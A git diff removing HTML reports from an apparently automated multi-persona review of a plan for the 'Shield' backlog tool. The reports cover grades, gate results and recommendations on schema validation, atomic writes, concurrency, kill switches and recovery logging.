DX Engineer1.0B (3.4)Clear & sound, but 3 design_refs point at non-existent LLDs and the capture-helper signature is deferred
Agile Coach0.7B (3.36)Sprint-ready with an acyclic, fully-covered DAG; only EPIC-2-S2's match heuristic is not estimable
Backend Engineer1.0B (3.33)Read-contract verified accurate; held back by open helper signature + atomicity≠isolation
Security Engineer1.0B (3.05)Sound for local single-actor tooling; N1 race + F6 no-stamping asserted but untested
SRE0.7B (3.0)Failure-mode analysis & staged rollout are A-grade; day-2 instrumentation is thin
Product Manager0.7A (3.7)Strong on impact/scope/prioritization/reversibility; PM10 business-value baseline unvalidated (C)
-

Composite = (3·1.0 + 3·0.7 + 3·1.0 + 3·1.0 + 3·0.7 + 4·0.7) / 5.1 = 3.14 → B — Ready

-

Deterministic TRD Gates (run before persona dispatch)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
GateRuleResult
0aSchema validation (validate_plan.py)✅ PASS (exit 0)
0bTRD 14-section presence (validate_trd.py)✅ PASS (exit 0)
0cStale-anchor on design_refs[]✅ PASS — all trd.md#… anchors live; lld refs have null anchors (intentional TODO)
0dPRD↔TRD duplication (>80-char overlap)FAIL → P0 — TRD §2 restates PRD §3 with a 92-char verbatim overlap
0eImplementation-manual (§7 fence >20 lines)✅ PASS — §7 is a 13-line ASCII diagram, not code
-

Consolidated Recommendations

-

P0 — Must Fix (blocks sprint planning)

-
    -
  1. [Gate 0d] Paraphrase TRD §2 so it no longer restates PRD §3 verbatim. The opening sentence shares a 92-char run (" — during /research, while writing a PRD, mid-/plan, and especially during /implement ") with PRD §3, exceeding the 80-char duplication threshold. Rewrite TRD §2 to summarize the problem in technical-framing terms and link to PRD §3 rather than repeating it. (One-line fix; mechanical.)
  2. -
-

P1 — Should Fix (plan quality)

-
    -
  1. [Backend, DX] Lock the skill write-helper signature in EPIC-1-S1/S2 ACs. This is the carried-forward PRD-review P1, but TRD §12 Q3 still punts the signature to "/lld or implementation." Pin name, module path, params, return, and raise-on-invalid behavior now (e.g. capture(text, *, kind="task", feature=None, epic=None, source) -> entry_id in shield/scripts/backlog_store.py) — downstream skills cannot be built/tested against an undefined shape.
  2. -
  3. [Backend, Security] Name the concurrency strategy — atomicity ≠ isolation. N1 defends "capture racing reconciliation," but temp-then-rename alone does not prevent lost updates (two read-modify-writes → last-writer-wins drops an entry). Either document the single-writer assumption where N1 describes the threat (N5 already says "single actor") or add a lock / re-read-and-merge / O_EXCL. Add an interleaved-capture eval.
  4. -
  5. [DX, Agile, Backend] Define the feature/epic match + suggestion heuristic. Replace "best match" / "names expected stable" (EPIC-2-S2, EPIC-3-S2) with a concrete rule: normalization (case/whitespace), tie-break/ambiguity → entry stays, and epic-rename behavior. Add a measurable AC and resolve PRD §9's open "discovery cost" question (or land /lld epic-suggester).
  6. -
  7. [Security] Add an eval asserting promotion leaves plan.json byte-unchanged (F6 no-stamping). F6 is the load-bearing trust boundary; it has an AC but is absent from EPIC-4-S1's listed eval coverage.
  8. -
  9. [Security] Add an AC that a malformed/partial backlog.json on read is refused with a named error. "Validate-or-refuse on read" (F2/N1) currently has no AC proving the refusal path (only crash-atomicity is tested).
  10. -
  11. [SRE] Ship the "disable eager prune" kill switch as a story/task. §14 names it as the rollback action but no story delivers the toggle — add a .shield.json flag (e.g. backlog.auto_reconcile) disabling eager prune and lazy sweep independently. Today the documented mitigation is unactionable.
  12. -
  13. [SRE] Log successful removals with rationale. Only the never-remove-on-doubt path logs (N3). Eager prune / lazy sweep should log {entry id, feature, epic, match-kind, triggering run, gating plan.json} to a defined destination — otherwise a confident-but-wrong removal leaves a git diff with no reasoning.
  14. -
  15. [SRE] Close the uncommitted-state recovery gap. Eager prune fires at end-of-/plan//implement, possibly before backlog.json is committed — at which point git revert (N4) cannot recover the entry. Commit before the destructive prune, or write pruned entries to a transient .shield/backlog-removed.log.
  16. -
  17. [SRE] Instrument the N2 ~1s budget. "Revisit if breached" (Q1 epic-index) is unfalsifiable without timing — add a debug-gated latency line to /backlog view so the breach signal isn't "a human notices slowness."
  18. -
  19. [PM10] Ground the business-value claim with a rough baseline. The whole justification rests on an explicitly unvalidated assumption that lost future-work volume is high enough to justify the tool. Count lost/re-derived items over a recent week (git history / chat) before committing all four milestones.
  20. -
  21. [Backend] Specify the id contract. id is required but its type, generation strategy, and uniqueness are undefined, yet remove/promote/prune all key off it. Add type + generation (uuid4/monotonic/slug) + a uniqueness constraint in EPIC-1-S1, plus an AC: "schema rejects duplicate id."
  22. -
  23. [Backend] State the "epic landed" gate as one precise predicate. F7 ("epic's work appears"), EPIC-3-S2 AC ("epic's stories appear"), and the schema (stories[] minItems:1) say it three ways. Pin it: "epic with matching id/name is present in plan.json.epics[]; story status is not consulted."
  24. -
-

P2 — Nice to Have

-
    -
  1. [DX] Name the CI entrypoint + path-filter glob in EPIC-4-S1 ("wire into CI" is not actionable as written).
  2. -
  3. [DX] Add an explicit intra-epic story-dependency note for EPIC-3 (S1+S2 must land before S3).
  4. -
  5. [DX] Specify the badge render format once (EPIC-2-S1 shows it only as an example) and add a local-dev/dry-run loop to the backlog SKILL.md.
  6. -
  7. [Agile] Add code-review + "marketplace version published" steps to the implied Definition of Done (EPIC-4-S2).
  8. -
  9. [Agile] Land or stub /lld backlog-store, /lld epic-suggester, /lld reconciler so the unresolved TODO design_refs resolve before sprint start.
  10. -
  11. [Backend] Add a no-op migrate(doc)->doc seam + test, or explicitly scope the schema_version AC as doc-only-until-v2 (it currently overstates "migration policy present" as working code).
  12. -
  13. [Security] Add a --dry-run reconciliation canary so a maintainer validates against their real backlog before trusting auto-removal.
  14. -
  15. [Security] Add a fixture for epic-name collision across two different features (PRD §10 risk / §14 trigger) asserting the entry stays.
  16. -
  17. [Security] Define the security purpose of the source ∈ {user, agent} field (provenance/audit-only vs. trust signal) and address agent-injected entries flowing into /plan.
  18. -
  19. [Security] Note in N4/EPIC-1-S4 that git-revert recoverability only covers committed entries — a manual remove of an uncommitted entry is unrecoverable by design.
  20. -
  21. [SRE] Give the manual /backlog audit a concrete cadence and "what reading triggers action."
  22. -
  23. [SRE] Add a recovery-rehearsal eval (assert git revert / restore brings a wrongly-pruned entry back).
  24. -
  25. [PM5] Add a 2–3 sentence plain-language executive summary atop trd.md and plan.md before the schema-/pipeline-heavy detail.
  26. -
-

Detailed Agent Findings

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
AgentGradeDetailed Report
DX EngineerBdetailed/dx-engineer.md
Agile CoachBdetailed/agile-coach.md
Backend EngineerBdetailed/backend-engineer.md
Security EngineerBdetailed/security-engineer.md
SREBdetailed/sre.md
Product Manager (PM1–PM10)Adetailed/product-manager.md
- -
-
Generated by Shield
- - diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/agile-coach.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/agile-coach.html deleted file mode 100644 index f7582d3e..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/agile-coach.html +++ /dev/null @@ -1,133 +0,0 @@ - - - -Shield Plan Review — Backlog - -

Agile Coach — Detailed Findings

-
-

Back to summary

-
-

Persona grade: A−. A mature re-plan: prior findings folded and traceable, decisions LOCKED, milestone DAG verifiably acyclic with full story coverage and no dangling references, ACs overwhelmingly independently testable. Short of A because EPIC-3-S3 carries an either/or recovery AC that can't be written as a single test, and the same story bundles four concerns.

-

Evaluation points (A–F)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#PointGrade
AC1Story sizingA−
AC2Story independenceB+
AC3Dependency orderingA
AC4Context completenessA
AC5Requirements clarityA
AC6Implementation step qualityA−
AC7Acceptance criteria testabilityA−
AC8Sprint-readinessA−
AC9Estimation feasibilityA
AC10Definition of Done alignmentA−
AC13Milestone coverageA (M1=5, M2=1, M3=5)
AC14Milestone reference integrityA (no dangling milestone_id)
AC15Milestone exit-criteria testabilityA−
AC16Milestone DAG integrityA (acyclic M1→M2→M3)
-

Findings

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
PriorityPointRecommendation
P1AC7EPIC-3-S3 AC5 encodes an unresolved OR ("backlog.json committed before the prune or appended to .shield/backlog-removed.log") — not writable as one pass/fail test. Pick one mechanism (LLD leans to the removed-log) and rewrite as a single asserted behavior.
P2AC1/AC15EPIC-3-S3 bundles four concerns (eager, lazy, kill switch, recovery); M3's 6th exit criterion folds 10 eval behaviors into one line. Consider splitting S3 into S3a (triggers) + S3b (kill switch + recovery + latency). Not blocking.
P2AC8/AC9M2 carries a single story while EPIC-2-S1 sits in M1 — EPIC-2 deliberately straddles M1/M2. Note this in the plan so it doesn't read as a numbering slip.
P2AC6N2 ~1s target is verified only by a debug line, not an assertion. State the WARN threshold the human checks against (e.g. "log WARN if view+sweep > 1s").
-

No P0 findings. Dependency ordering and milestone integrity (coverage, references, DAG, exit-criteria testability) all pass programmatic verification.

- - diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/backend-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/backend-engineer.html deleted file mode 100644 index a1ce3ec0..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/backend-engineer.html +++ /dev/null @@ -1,99 +0,0 @@ - - - -Shield Plan Review — Backlog - -

Backend Engineer — Detailed Findings

-
-

Back to summary

-
-

Persona grade: B−. A well-structured, honestly-bounded plan with excellent error/idempotency/testability discipline, held back from B+/A− by three contract defects that only surface when the design is placed next to the real manifest.json / plan.json / shield.schema.json.

-

Evaluation points (A–F)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#PointGrade
1F8 "epic landed" predicate consistencyB
2Single-writer concurrency claim (N1)B+
3Atomic-write + validate-or-refuse correctnessA−
4The id contractA−
5LLD API contracts implementable as specifiedC+
6Python packaging via uvB
7Error semanticsA−
8IdempotencyA
9TestabilityA−
-

P0 findings (verified against live schemas)

-

P0-1 — reconcile/suggest_* contracts don't match the real manifest.json/plan.json shapes

-

Every cross-document reference treats manifest and plans as opaque dicts, but the live artifacts have a specific shape the contracts contradict. manifest.json is {"schema_version":…, "features":[ {name, artifacts:{research,prd,plan_json,plan_md,plan_arch_md}, reviews, updated} ]} — a list keyed by name, with a boolean plan_json flag and no plan path stored. reconcile(entry, *, manifest: dict, plans: dict) (lld-reconciler.md §5) never defines plans and never says the reconciler must derive docs/shield/<feature>/plan.json. -Fix: pin the real shapes in lld-reconciler.md §5 and lld-epic-suggester.md §5; define plans: dict[str, dict] (feature-slug → parsed plan.json) populated by reading docs/shield/<feature>/plan.json for each feature whose artifacts.plan_json is True; state the flag is plan_json (boolean) and the path is derived. Add an EPIC-4-S1 fixture from the actual manifest schema.

-

P0-2 — F8 "match existing-epic by id" matches a positional slot, not a stable identity

-

Epic ids are positional EPIC-N slugs assigned by /plan, not durable identifiers. After any re-/plan, EPIC-2 points at a different epic. An existing-epic backlog entry stamped EPIC-2 will then match the wrong epic (false removal) or fail to match (entry rots). Verified: plan-trd-refactor-20260524 EPIC-2 = "Story schema and design traceability" vs pm-restructure-v0-20260521 EPIC-2 = "Global authoring…". -Fix: match existing epics by normalized name too (same predicate as proposed-new); treat EPIC-N only as a within-a-single-plan disambiguator. If id-matching is kept, document the re-plan failure mode and add a "epic reordered across a re-plan" eval.

-

P0-3 — Kill switch backlog.auto_reconcile cannot live in .shield.json as the schema stands

-

shield/schemas/shield.schema.json has additionalProperties: false and properties [project, domains, output_dir, reviewers, devcontainer, external_skills] — no backlog key. Adding backlog.auto_reconcile to a real .shield.json fails validation, and no story includes the schema change. -Fix: add a task+AC (EPIC-3-S3, reflected in EPIC-4-S2 version bump) to extend shield.schema.json with an optional backlog object ({auto_reconcile: bool, default true}) + a config example. Without this the documented first-line rollback (TRD §14) is unshippable.

-

P1 findings

-
    -
  • P1-1 — Concurrency eval tests a race the single-writer design says cannot occur. Nothing enforces serialization (no lock). Either the race can't happen (eval vacuous) or it can (read-modify-write is not atomic — os.replace() only makes the rename atomic; loser's entry is silently dropped). Resolve: rescope to sequential, OR add a minimal compare-before-replace/merge and test it.
  • -
  • P1-2 — F2/EPIC-1-S1 AC says "the schema rejects duplicate id"; JSON Schema (2020-12) cannot express property-level array uniqueness. Reword to "the validator (validate_backlog.py) rejects duplicate id with duplicate_entry_id."
  • -
  • P1-3 — Feature "name" (manifest) vs "folder slug" (reconciliation key) conflated. Pin the invariant (features[].name == folder slug) and make suggest_feature return that field; add a fixture asserting the suggested value resolves to an existing docs/shield/<value>/ path.
  • -
  • P1-4 — Packaging model unresolved. F3 ("every capturing skill builds against this signature") implies an importable module, but EPIC-4-S2 hedges ("if backlog scripts are packaged"). Decide at plan time — recommend packaging with a pyproject.toml so the version bump is unconditional; document how a skill calls capture().
  • -
-

P2 findings

-
    -
  • P2-1 — Atomic write omits os.fsync() before os.replace() (power-loss window) and uses a fixed .tmp name (stale-temp collision). Add fsync + unique temp suffix.
  • -
  • P2-2read() -> dict forces every caller to re-validate shape; consider returning the pydantic model (read() -> BacklogDoc).
  • -
  • P2-3RemovalDecision / Candidate payloads referenced but RemovalDecision's fields (the F9 log fields) are undefined. Add a 4-field dataclass in lld-reconciler.md.
  • -
-

Verification sources: shield/schemas/plan.schema.json, shield/schemas/shield.schema.json, docs/shield/manifest.json.

- - diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/dx-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/dx-engineer.html deleted file mode 100644 index 3c6c1ab6..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/dx-engineer.html +++ /dev/null @@ -1,159 +0,0 @@ - - - -Shield Plan Review — Backlog - -

DX Engineer — Detailed Findings

-
-

Back to summary

-
-

Persona grade: A−. An unusually handoff-ready plan — locked signatures, named errors, an atomic-write recipe, and a kill switch make most stories startable without tribal knowledge. Falls short of A on two interface contracts a developer hits in M1/M3 that are referenced but not pinned.

-

Evaluation points (A–F)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#PointGradeNote
DX1Plan clarityATRD "In one line" + Milestones table convey the goal in <30s.
DX2Story actionabilityA−Each story has description + tasks + ACs + design_refs.
DX3Implementation step detailA−Exact file paths, locked signature, write recipe, validator command.
DX4Ambiguity auditB+"LOCKED" decisions, named errors; residual: N2 "≲1s", "audit cadence (e.g. monthly)".
DX5Context sufficiencyAPRD framing, TRD §1 reader list, §8 alternatives, carried-forward trace.
DX6Dependency clarityAMilestone DAG + explicit EPIC-3-S3 intra-epic dependency.
DX7Tool & access requirementsBuv named; missing Python version + pydantic/jsonschema prereq statement.
DX8Handoff readinessA−Locked signatures, named errors, atomic-write recipe, kill-switch key.
DX9Service boundariesAThree components cleanly separated; single writer.
DX10API & data flow designB+manifest.json field names not pinned as ground truth.
DX11Deployment strategyA−Additive behind kill switch; 3-tier rollback.
DX12CI/CD integrationB+Path glob named, but CI entrypoint still a task, not a value.
DX13Error handling patternsAFailure modes enumerated per component; never-remove-on-doubt.
DX14Configuration managementA−One config key fully specified; recovery log path defined.
DX15Developer onboardingB+Dry-run loop mandated but not yet written.
-

Findings

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
PriorityPointRecommendation
P1DX10Pin the manifest.json read-contract in TRD §11 (exact keys read + example) so EPIC-2-S1/EPIC-3-S2 don't reverse-engineer the live file. (Overlaps backend P0-1.)
P1DX12Resolve the CI entrypoint to a concrete value (the actual workflow file + runner), not a task, so the eval-gate AC is verifiable.
P2DX4/DX15Replace "e.g. monthly" audit cadence with a fixed interval + numeric trigger (lift PRD §7 thresholds verbatim).
P2DX7/DX15State runtime prereqs once in the backlog SKILL.md (Python ≥3.x via uv; validator uses pydantic+jsonschema).
P2DX1Label the two composites inline — PRD-review 3.12 vs plan-review 3.14 — to avoid a misread in the plan.md header.
-

No P0 findings from DX: the deferred TRD is present and complete, the prior P0 (gate-0d) is folded, locked decisions propagate consistently, every story has self-contained ACs.

- - diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/product-manager.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/product-manager.html deleted file mode 100644 index dfa5731a..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/product-manager.html +++ /dev/null @@ -1,109 +0,0 @@ - - - -Shield Plan Review — Backlog - -

Product Manager — Detailed Findings (PM1–PM10 decomposed)

-
-

Back to summary

-
-

Persona grade: A (average of 10 dim grades = 3.6). Dispatched as 10 parallel dim subagents per the pm-restructure-v0 registry.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
DimNameSeverityGradeGap / note
PM1User impact clarityCriticalANamed personas (P1 Ashwini/maintainer, P2 the agent); concrete impact; §7 numeric magnitude.
PM2Problem-solution fitCriticalA"nowhere to park that work" → ordered store + reconciliation directly fits.
PM3Scope discipline (plan)ImportantAExplicit out-of-scope (hooks, per-feature, state machine, pm-sync, locking) + §8 alternatives + validate-the-bet gate. Opposite of kitchen-sink.
PM4Prioritization rationaleImportantBSequencing + named deps + PM10 value-gate present, but no effort/impact estimates per phase; priorities nearly all "high".
PM5Stakeholder communicabilityImportantBTRD "In one line" + PRD §3 give a plain entry point, but docs are otherwise pervasively engineering-framed; no dedicated stakeholder/executive summary.
PM6Market / competitive awarenessWarningBPM-tool backlog named as incumbent + differentiated, but the buy-vs-build case is asserted, not reasoned.
PM7Adoption & rollout riskImportantACapture-friction risk + mitigation; the no-hooks bet surfaced as an unvalidated assumption.
PM8Success metricsImportantAFour §7 metrics, three with numeric thresholds + counters; manual measurement mechanism named (no telemetry).
PM9Reversibility & exit costWarningATRD §14 graded exit ramp (kill switch → revert/replay → PR back-out) tied to observable triggers.
PM10Business value alignmentCriticalBTied to real operational pain + measurable outcome, but the load-bearing value premise is explicitly unvalidated (no baseline) and links to internal-workflow pain, not a named OKR.
-

Consolidated PM recommendations (P2)

-
    -
  • PM4: add a coarse effort estimate (t-shirt/points) + one-line impact per milestone so M1→M2→M3 is justified by impact-per-effort, not dependency chains alone.
  • -
  • PM5: add a 3–4 sentence stakeholder/executive summary near the top of the PRD (or promote the TRD one-liner) stating what + business-why in plain language before the jargon.
  • -
  • PM6: add 1–2 sentences making the buy-vs-build case explicit — why the ClickUp/Jira backlog can't serve as the pre-pipeline staging area (not co-located with manifest.json/plan.json, no reconciliation against Shield artifacts, would pollute the PM board of record).
  • -
  • PM10: state the operational cost the tool recovers in concrete terms (ideas lost/re-derived per week, or maintainer re-scoping time) so the "justifies the tool" bet has a falsifiable target the 30-day v1 audit can measure against.
  • -
-

No P0/P1 from the PM persona — all four sub-B dims are Important/Warning-severity B grades (→ P2).

- - diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/security-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/security-engineer.html deleted file mode 100644 index da925030..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/security-engineer.html +++ /dev/null @@ -1,170 +0,0 @@ - - - -Shield Plan Review — Backlog - -

Security Engineer — Detailed Findings

-
-

Back to summary

-
-

Persona grade: A−. Security-mature for its surface (single-actor local tool over a plaintext git-tracked store of developer idea text — no PII/auth/network). Threat model is honest, trust boundaries are clean, and security claims are pinned to executable, falsifiable ACs. The four folded prior-review findings are all present, correctly threat-framed, and sufficient. Lands A− (not A) because the recovery layer (N4) and single-writer claim (N5) rest on ordering/assumption guarantees not yet pinned to tests.

-

Folded-finding verification

- - - - - - - - - - - - - - - - - - - - - - - - - -
Folded findingSufficient?
Malformed/partial read refused with BacklogInvalid (F5)Yes — "single integrity primitive" (TRD §9), concrete AC
Concurrency eval: no corruption AND no lost entryYes — correctly distinguishes lost-entry (RMW race) from corruption (crash mid-write)
No-stamping eval (F6): plan.json byte-unchangedYes — byte-unchanged is the right assertion
Epic-name collision across features → ambiguous → staysYes — fixture exists (ambiguous-match-stays)
-

Evaluation points (A–F)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#PointGrade
SE1Threat model coverageA−
SE2Least-privilege designA
SE3Data protectionA
SE4Secrets managementA
SE5Network securityN/A
SE6Access controlN/A
SE7ComplianceN/A
SE8Incident responseA−
SE9Acceptance criteria qualityA
SE10Edge case & rollback coverageA−
SE11Integration test strategyA
SE12Regression riskA
SE13Environment validationB+
SE14Security validationA−
-

Findings

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
PriorityPointRecommendation
P1SE10/SE1 (P1-a)No detection for a violated single-writer assumption (N5). If violated, the outcome is a silent lost update. Add a cheap compare-before-replace: capture()/remove() carry the schema_version+entry-count (or mtime/hash) read at start and refuse os.replace() if the on-disk file changed underneath — converts a silent lost-update into a loud BacklogInvalid refusal without a lockfile. (Also resolves backend P1-1.)
P1SE14/SE9 (P1-b)Write-side validation is asserted ("validate-or-refuse on read/write") but only read-side + crash-mid-write are tested. Add AC+eval: "capture() that would produce a schema-invalid document raises BacklogInvalid and leaves backlog.json byte-unchanged (no .tmp promoted)."
P1SE10/SE14 (P1-c)The recovery-sink ordering (append-before-remove) is stated in prose but not pinned to a test. Strengthen the recovery-rehearsal eval to assert recoverability across a simulated crash at the ordering seam (after append/before remove; after remove/before commit).
P2SE1/SE8 (P2-a).shield/backlog-removed.log is a new write surface with no integrity story (no schema, no validate-or-refuse, git-tracked status unspecified). Specify tracked/ignored + read it back through a defined parser in the recovery eval.
P2SE13 (P2-b)Dry-run isolation is a doc task, not a guarded invariant; the lazy sweep runs on every view. Make dry-run/fixture mode provably non-destructive (force kill switch off, or disable sweep when a fixture path is supplied) + add to the eval matrix.
P2SE1 (P2-c)Migration is doc-only (correct for v1); add a forward note that any future migrate() must itself be validate-or-refuse (a half-migrated write is the next corruption vector).
-

No P0 findings from security.

- - diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/sre.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/sre.html deleted file mode 100644 index f342c0aa..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/sre.html +++ /dev/null @@ -1,145 +0,0 @@ - - - -Shield Plan Review — Backlog - -

SRE / Operations — Detailed Findings

-
-

Back to summary

-
-

Persona grade: A−. Operationally mature: all four prior SRE findings landed with verbatim fidelity; failure-mode analysis is genuinely strong (safe-failure direction is explicit and testable). Remaining risk is concentrated in the N4 recovery path.

-

Prior-finding verification

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
FindingLanded?Sufficient?
OP1 — log every removal with rationale {entry id, feature, epic, match-kind, triggering run, gating plan.json path}Yes (TRD §5 F9, EPIC-3-S2, lld-reconciler §10)Yes — elevated to single integrity surface (TRD §9)
OP7 — kill switchYes (TRD §5 F10, §14, EPIC-3-S3, lld-reconciler §9)Mostly — see P2-1: a single boolean disables both; "independently" is not actually delivered
OP4 — uncommitted-state recovery gapYes (TRD §6 N4, §9, §14, EPIC-3-S3, lld-reconciler §8)Yes for eager path; see P1-1 — the OR is unresolved
OP2/OP5 — N2 latency instrumentedYes (TRD §6 N2, EPIC-3-S3, lld-reconciler §10/§12.4)Yes — wired to a §14 rollback trigger
-

Evaluation points (A–F)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#PointGrade
OP1Observability planA
OP2Monitoring & alertingB
OP3Failure mode analysisA
OP4Backup & recoveryB+
OP5Capacity planningA−
OP6Change managementA
OP7On-call readinessB+
-

Findings

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
PriorityPointRecommendation
P1OP4 (P1-1)N4 recovery mechanism is an unresolved OR with divergent semantics (commit-before-prune → git revert, vs removed-log → replay). The §14 runbook can't be written precisely. Pick one v1 default — recommend removed-log (avoids forcing a possibly-dirty-tree commit on every prune; decouples recovery from git state, which matters mid-/implement). Make the other an explicit non-goal; update EPIC-3-S3 AC + §14 step 2.
P2OP7 (P2-1)Kill switch doesn't disable triggers "independently" — one coupled boolean. Drop the "independently" framing (coupled is the right v1 scope) or split into auto_reconcile.eager/.lazy.
P2OP2 (P2-2)Wrong-removal detection is pull-only (operator must read the log). Have /backlog view surface "N entries removed since last view (see backlog-removed.log)" when the log grows.
P2OP4 (P2-3)Removed-log lifecycle undefined (git-tracked vs gitignored, rotation, max size). Specify — and the tracked/ignored choice ties to P1-1.
P2OP7 (P2-4)EPIC-4-S2 AC lists feature docs for SKILL.md but not the recovery procedure. Add: SKILL.md documents wrong-removal recovery (flip kill switch → locate F9 log line → revert/replay).
P2OP7 (P2-5)Audit interval still "e.g. monthly" — commit to an actual interval.
P2OP1 (P2-6)Specify no-op eager prune logging (if lazy sweep beat it): "no-op prune emits no log line" to avoid duplicate recovery records.
-

No P0 findings.

- - diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/enhanced-plan.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/enhanced-plan.html deleted file mode 100644 index 1983554a..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/enhanced-plan.html +++ /dev/null @@ -1,207 +0,0 @@ - - - -Shield Plan Review — Backlog - - - -

Plan — Shield Backlog (enhanced 2026-05-29)

-

Project: Shield · Phase: v1 · Domain: backend (Python) -PRD: prd.md (PRD-review Ready, composite 3.12) · TRD: trd.md · Sidecar: plan.json -Plan-review: Ready, composite 3.49 (B+) — conditional on the 3 P0 fixes below.

-
-

Changes applied in this enhanced version (review 2026-05-29):

-
    -
  • P0-1 / P0-2 / P0-3 folded into EPIC-3-S2, EPIC-3-S3, EPIC-1-S1, and a new schema task.
  • -
  • P1s (recovery-OR resolution, lost-update detection, dup-id wording, name==slug, packaging, CI entrypoint, write-side + ordering-seam evals) folded into the affected stories.
  • -
  • P2s recorded as inline [P2] notes for the implementer to pick up opportunistically.
  • -
-
-

Milestones

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
IDNameDepends onTouches LLDOutcome
M1Capture + store + viewbacklog-storebacklog.json + schema/validator; capture (user + skill, atomic, validate-or-refuse, lost-update detection); /backlog ordered view with manifest status badges; manual remove.
M2Feature + epic association + suggestionM1epic-suggesterEvery entry carries feature + epic; agent suggests via exact-normalized match against the pinned manifest/plan shapes; user accept/replace/create-new.
M3Promotion + reconciliationM2reconcilerPromotion via transient reference; reconciliation engine (single "epic landed" predicate matching existing epics by name, never-remove-on-doubt, drift tolerance, removal logging); eager + lazy idempotent triggers + kill switch (incl. .shield.json schema change); eval suite + version bump.
-
-

EPIC-1 — Store, schema & capture (M1)

-

EPIC-1-S1 · Define backlog.json schema and validator (high)

-

Define backlog.json shape + JSON Schema with a top-level schema_version, plus a Python validator. Entry: {id, order:int, kind∈{epic,story,task}, source∈{user,agent}, feature, epic, text}.

-
    -
  • Tasks: author shield/schema/backlog.schema.json; id = uuid4 string; document entry shape + migration policy (doc-only until schema_version 2) in shield/skills/general/backlog/SKILL.md; create shield/scripts/validate_backlog.py; ordering = single integer order. -
      -
    • [P1-2 — fix] Uniqueness of id across entries[] is enforced by validate_backlog.py (named error duplicate_entry_id), not by the JSON Schema — draft 2020-12 uniqueItems is whole-item equality and cannot express property-level uniqueness. Reword F2 + the AC accordingly.
    • -
    • [P1-3 — fix] Document the invariant manifest features[].name == feature folder slug (the reconciliation key) in the SKILL.md, since suggestion + reconciliation both rely on it.
    • -
    • [P2] State runtime prereqs once (Python ≥3.x via uv; validator uses pydantic + jsonschema).
    • -
    -
  • -
  • AC: schema rejects unknown kind/source (named error); the validator rejects duplicate id (duplicate_entry_id); validate_backlog.py exits 0/non-zero correctly; schema_version + migration policy present; id is a uuid4 string.
  • -
  • Design: TRD §11 APIs Involved · LLD backlog-store §4 Data model
  • -
-

EPIC-1-S2 · Capture entrypoint (user + skill) with atomic write + lost-update detection (high)

-

Capture usable by the user (/backlog add) and any skill (documented capture() helper). Atomic temp-then-rename + validate-or-refuse.

-
    -
  • Tasks: /backlog add (assigns next order + uuid4 id); LOCKED signature capture(text, *, kind="task", feature=None, epic=None, source) -> str in shield/scripts/backlog_store.py, raising BacklogInvalid; LOCKED single-writer (no lock) → full doc → .tmpos.replace(). -
      -
    • [P1-1 — fix] Add compare-before-replace: capture()/remove() capture the on-disk schema_version+entry-count (or mtime/hash) at read time and refuse the os.replace() if the file changed underneath, raising BacklogInvalid. Converts a silent lost-update (the real N1/N5 threat) into a loud refusal without a lockfile.
    • -
    • [P1-4 — fix] Package backlog_store as an importable module with a pyproject.toml (F3 requires skills to import capture()); document the import path. Makes the EPIC-4-S2 version bump unconditional.
    • -
    • [P2] os.fsync() the temp fd before os.replace(); use a unique .tmp suffix (pid/uuid). Consider read() -> BacklogDoc (pydantic) over raw dict.
    • -
    -
  • -
  • AC: user + skill capture both work; interface documented + pinned in TRD §11; mid-write kill leaves no corruption; a concurrent on-disk change between read and replace is refused with BacklogInvalid (no lost entry); malformed/partial read refused with BacklogInvalid.
  • -
  • Design: TRD §5 Functional Requirements · LLD backlog-store §5 API contracts
  • -
-

